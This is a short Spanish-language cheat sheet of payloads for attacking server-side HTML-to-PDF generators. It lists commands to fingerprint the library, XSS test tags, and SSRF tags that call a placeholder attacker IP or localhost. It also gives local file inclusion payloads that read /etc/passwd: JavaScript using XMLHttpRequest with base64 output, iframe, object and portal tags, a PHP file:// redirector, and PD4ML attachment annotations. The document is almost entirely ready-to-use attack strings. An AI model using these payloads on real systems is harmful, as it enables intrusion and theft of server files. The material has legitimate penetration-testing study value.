Identificación de librerÃa de generación de PDF
exiftool file.pdf
pdfinfo file.pdf
<script>document.write('test')</script>
<script>document.write(window.location)</script>
Server-side request forgery (SSRF)
<img src="http://<attacker-IP-address>/test"/>
<link rel="stylesheet" href="http://<attacker-IP-address>/test"/>
<iframe src="http://<attacker-IP-address>/test"></iframe>
<iframe src="http://127.0.0.1:80/api/" width="800" height="400"></iframe>
Local file inclusion (LFI)
Con ejecución de JavaScript.
<script>
function addNewLines(str) {
var result = '';
while (str.length > 0) {
result += str.substring(0, 100) + '\n';
str = str.substring(100);
}
return result;
}
x = new XMLHttpRequest();
x.onload = function(){
document.write(addNewLines(btoa(this.responseText)))
};
x.open("GET", "file:///etc/passwd");
x.send();
</script>
Sin ejecución de JavaScript.
<iframe src="file:///etc/passwd" width="800" height="400"></iframe>
<object data="file:///etc/passwd" width="800" height="400">
<portal src="file:///etc/passwd" width="800" height="400">
Sin ejecución de JavaScript + SSRF.
<?php header('Location: file://' . $_GET['url']); ?>
<iframe src="http://<attacker-IP-address>/redirector.php?url=%2fetc%2fpasswd" width="800" height="400"></iframe>
Anotaciones y adjuntos.
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />
# PD4ML
<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>